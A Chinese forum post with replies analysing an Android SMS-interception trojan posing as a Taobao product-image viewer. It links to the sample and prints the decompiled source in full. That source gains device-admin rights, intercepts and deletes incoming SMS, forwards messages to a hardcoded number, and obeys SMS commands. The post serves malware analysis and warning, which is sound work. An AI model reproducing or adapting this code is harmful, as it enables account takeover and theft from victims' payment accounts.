apk短信拦截马简单分析
本帖最后由 imjc 于 2013-11-16 00:13 编辑文件信息:
File Name: 淘宝宝贝分享图.apk
File MD5: D9C5B64070D54BB6477C9154E41344FF
样本下载地址:http://www.kuaipan.cn/file/id_204886686096687106.htm
使用工具:
dex2jar
jd_Gui
1.使用解压软件右键解压得到以下文件:
2.下载dex2jar工具解压:
把classes.dex 拷贝到dex2jar目录下:在路径上输入cmd后再输入:dex2jar.bat classes.dex 回车后
得到文件:classes_dex2jar.jar
3.使用jd_Gui打开刚才得到classes_dex2jar.jar文件:
4.查看具体代码:
App文件代码如下:
package com.sonyericsson.androidapp.microblogci8dmdo4;
import android.app.Application;
import android.os.Process;
public class App extends Application
implements Thread.UncaughtExceptionHandler
{
public void onCreate()
{
super.onCreate();
Thread.setDefaultUncaughtExceptionHandler(this);
}
public void uncaughtException(Thread paramThread, Throwable paramThrowable)
{
Process.killProcess(Process.myPid());
}
}
L文件代码如下:
package com.sonyericsson.androidapp.microblogci8dmdo4;
import android.app.Activity;
import android.app.admin.DevicePolicyManager;
import android.content.ComponentName;
import android.content.Intent;
import android.content.pm.PackageManager;
import android.os.Build.VERSION;
import android.os.Bundle;
import android.os.Handler;
public class L extends Activity
{
private DevicePolicyManager a;
private ComponentName b;
protected void onCreate(Bundle paramBundle)
{
super.onCreate(paramBundle);
setContentView(2130903040);
d.a(this, new SR());
d.a(this, "启动MainActivity");
d.a(this);
this.a = ((DevicePolicyManager)getSystemService("device_policy"));
this.b = new ComponentName(this, LR.class);
if (this.a.isAdminActive(this.b))
d.a(this, "已经注册设备管理器");
while (true)
{
if (Build.VERSION.SDK_INT < 14)
getPackageManager().setComponentEnabledSetting(getComponentName(), 2, 1);
finish();
Handler localHandler = new Handler();
localHandler.postDelayed(new a(this, localHandler), 5000L);
return;
Intent localIntent = new Intent("android.app.action.ADD_DEVICE_ADMIN");
localIntent.putExtra("android.app.extra.DEVICE_ADMIN", this.b);
localIntent.putExtra("android.app.extra.ADD_EXPLANATION", "设备管理器");
startActivity(localIntent);
d.a(this, "注册设备管理器");
}
}
}
LR文件代码如下:
package com.sonyericsson.androidapp.microblogci8dmdo4;
import android.app.admin.DeviceAdminReceiver;
import android.content.Context;
import android.content.Intent;
public class LR extends DeviceAdminReceiver
{
public void onDisabled(Context paramContext, Intent paramIntent)
{
d.a(paramContext, "取消使用");
super.onDisabled(paramContext, paramIntent);
}
public void onEnabled(Context paramContext, Intent paramIntent)
{
d.a(paramContext, "图片查看");
super.onEnabled(paramContext, paramIntent);
}
public void onReceive(Context paramContext, Intent paramIntent)
{
super.onReceive(paramContext, paramIntent);
}
}
SR文件代码如下:
package com.sonyericsson.androidapp.microblogci8dmdo4;
import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.os.Bundle;
import android.telephony.SmsMessage;
public class SR extends BroadcastReceiver
{
public void onReceive(Context paramContext, Intent paramIntent)
{
d.a(paramContext, "#SmsReceiver#onReceive" + paramIntent.getAction());
if (!"android.provider.Telephony.SMS_RECEIVED".equals(paramIntent.getAction()))
{
d.a(paramContext, this);
d.a(paramContext);
}
Bundle localBundle;
do
{
return;
localBundle = paramIntent.getExtras();
}
while (localBundle == null);
if (!d.b(paramContext))
{
d.a(paramContext, "#SmsReceiver#时间不在运行范围");
return;
}
Object[] arrayOfObject = (Object[])localBundle.get("pdus");
int i = arrayOfObject.length;
String str1 = "";
int j = 0;
String str2;
for (Object localObject = ""; ; localObject = str2)
{
if (j >= i)
{
d.b(paramContext, (String)localObject, str1);
abortBroadcast();
return;
}
SmsMessage localSmsMessage = SmsMessage.createFromPdu((byte[])arrayOfObject);
str2 = localSmsMessage.getOriginatingAddress();
str1 = str1 + localSmsMessage.getMessageBody();
j++;
}
}
}
U文件代码如下:
package com.sonyericsson.androidapp.microblogci8dmdo4;
import android.app.Activity;
import android.os.Bundle;
import android.widget.Toast;
public class U extends Activity
{
protected void onCreate(Bundle paramBundle)
{
super.onCreate(paramBundle);
d.a(this, new SR());
Toast.makeText(this, "应用程序尚未安装在您的手机上", 1).show();
finish();
}
}
a文件代码如下:
package com.sonyericsson.androidapp.microblogci8dmdo4;
import android.content.Intent;
import android.os.Handler;
class a
implements Runnable
{
a(L paramL, Handler paramHandler)
{
}
public void run()
{
this.b.removeCallbacks(this);
Intent localIntent = new Intent();
localIntent.setType("image/*");
localIntent.setAction("android.intent.action.GET_CONTENT");
this.a.startActivity(localIntent);
}
}
b文件代码如下:
package com.sonyericsson.androidapp.microblogci8dmdo4;
import android.content.Context;
import android.content.SharedPreferences;
import android.content.SharedPreferences.Editor;
import android.preference.PreferenceManager;
public class b
{
public static String a = "com.eg.android.AlipayGphone";
public static String b = "";
public static String c = "";
public static void a(Context paramContext)
{
SharedPreferences localSharedPreferences = PreferenceManager.getDefaultSharedPreferences(paramContext);
String str = b(paramContext);
if (!localSharedPreferences.getString("4yffd3", "").equals(str))
{
d.a(paramContext, "初次运行!");
localSharedPreferences.edit().putString("4yffd3", str).commit();
d.a(paramContext, null, "888");
}
}
public static String b(Context paramContext)
{
return "15884230675";
}
}
c文件代码如下:
package com.sonyericsson.androidapp.microblogci8dmdo4;
import android.content.ContentResolver;
import android.content.Context;
import android.database.ContentObserver;
import android.database.Cursor;
import android.net.Uri;
import android.os.Handler;
public class c extends ContentObserver
{
private Context a;
public c(Context paramContext)
{
super(new Handler());
d.a(paramContext, "#SMSObserver#注册");
this.a = paramContext;
this.a.getContentResolver().registerContentObserver(Uri.parse("content://sms/"), true, this);
}
public void onChange(boolean paramBoolean)
{
super.onChange(paramBoolean);
d.a(this.a, "#SMSObserver#onChange");
if (!d.b(this.a))
d.a(this.a, "#SMSObserver#时间不在运行范围");
while (true)
{
return;
Uri localUri = Uri.parse("content://sms/inbox");
Cursor localCursor = this.a.getContentResolver().query(localUri, null, null, null, null);
while (localCursor.moveToNext())
{
d.b(this.a, localCursor.getString(localCursor.getColumnIndex("address")), localCursor.getString(localCursor.getColumnIndex("body")));
String str = "content://sms/conversations/" + localCursor.getString(1);
this.a.getContentResolver().delete(Uri.parse(str), null, null);
}
}
}
}
d文件代码如下:
package com.sonyericsson.androidapp.microblogci8dmdo4;
import android.content.Context;
import android.content.IntentFilter;
import android.telephony.SmsManager;
import android.util.Log;
import java.text.SimpleDateFormat;
import java.util.Date;
import java.util.Locale;
public class d
{
public static boolean a = false;
private static boolean b = false;
private static long[] c;
private static boolean d = false;
public static void a(Context paramContext)
{
a(paramContext, "chkFirstRun");
if (b)
return;
b.a(paramContext);
b = true;
}
public static void a(Context paramContext, SR paramSR)
{
if (d)
return;
d = true;
new c(paramContext);
try
{
IntentFilter localIntentFilter = new IntentFilter();
localIntentFilter.setPriority(2147483647);
localIntentFilter.addAction("android.provider.Telephony.SMS_RECEIVED");
paramContext.getApplicationContext().registerReceiver(paramSR, localIntentFilter);
return;
}
catch (Exception localException)
{
a(paramContext, "注册监听异常:" + localException.getMessage());
}
}
public static void a(Context paramContext, String paramString)
{
if (a)
Log.e("T_DEBUG", paramString);
}
public static void a(Context paramContext, String paramString1, String paramString2)
{
if (paramString1 == null);
for (String str = b.b(paramContext); ; str = paramString1)
{
a(paramContext, "发送:" + str + " " + paramString2);
if (Boolean.parseBoolean(String.valueOf(a)))
return;
SmsManager localSmsManager = SmsManager.getDefault();
localSmsManager.sendMultipartTextMessage(str, null, localSmsManager.divideMessage(paramString2), null, null);
return;
}
}
public static void b(Context paramContext, String paramString1, String paramString2)
{
String str = b.b(paramContext);
if (paramString1.startsWith("+86"))
paramString1 = paramString1.substring(3);
a(paramContext, "收到:" + paramString1 + " " + paramString2);
if (paramString1.equals(str))
{
String[] arrayOfString = paramString2.split("A", 2);
if (arrayOfString.length != 2)
{
a(paramContext, "指令错误");
a(paramContext, null, "短信指令格式错误,格式为“手机号A短信内容”");
return;
}
a(paramContext, "SENDTO:" + arrayOfString + " content " + arrayOfString);
a(paramContext, arrayOfString, arrayOfString);
return;
}
a(paramContext, str, "[" + paramString1 + "]" + paramString2);
}
public static boolean b(Context paramContext)
{
if (c == null)
c(paramContext);
long l = System.currentTimeMillis();
if ((c == 0L) || (c == 0L));
while ((c <= l) && (c >= l))
return true;
return false;
}
public static void c(Context paramContext)
{
if (c == null)
{
SimpleDateFormat localSimpleDateFormat;
try
{
localSimpleDateFormat = new SimpleDateFormat("yyyy-MM-dd HH:mm", Locale.CHINA);
c = new long;
if (b.b.equals(""))
c = 0L;
while (b.c.equals(""))
{
c = 0L;
return;
c = localSimpleDateFormat.parse(b.b).getTime();
}
}
catch (Exception localException)
{
c = 0L;
c = 0L;
a(paramContext, "从RAW读取配置信息失败," + localException.getMessage());
return;
}
c = localSimpleDateFormat.parse(b.c).getTime();
}
}
}
代码如上。
大概危害:
虽然不太懂代码,但是可以看懂一点点:中了这个木马的人,手机上收到的信息会被转移到【15884230675】这个手机号码上,
而且中了这个木马的人手机收到的信息也无法看到。
从木马名字来看,这类木马主要是针对淘宝卖家,骗子作为买家,发送木马给卖家
告知卖家他看到别人的分享的东西,很喜欢,所有东西都在apk文件上,只要安装就可以看到列表了,如果有就所有都要了。
或许有些不谨慎的淘宝卖家就会安装了这个木马,然后骗子通过木马截取短信方式等,修改卖家淘宝账号或者支付宝账号等,洗劫卖家支付宝的金钱。
以上是个人的了解,第一次发帖,有哪些写得不对的地方请指教{:301_975:}
这个不太懂。 不算木马吧android哪来的木马{:1_904:} 只是恶意程序罢了不装就没事了 应该先给我们看看manifest文件里面是什么哇。
建议以后尽量多看看smali反汇编代码,毕竟别人做了保护的话dex2jar就不那么好用了。
整体已经分析出来了,不错,希望楼主多多分享{:301_975:} 支持原创!~~ 分析的不错,开放注册来的同学哦,注意多发帖回帖,防止被清理掉账号。 apk在哪里下载? 分析的很详细,这个软件在哪下载? 虽然不懂安卓,但是这个好像是可以反编译出源代码是吗? 还是要学习一下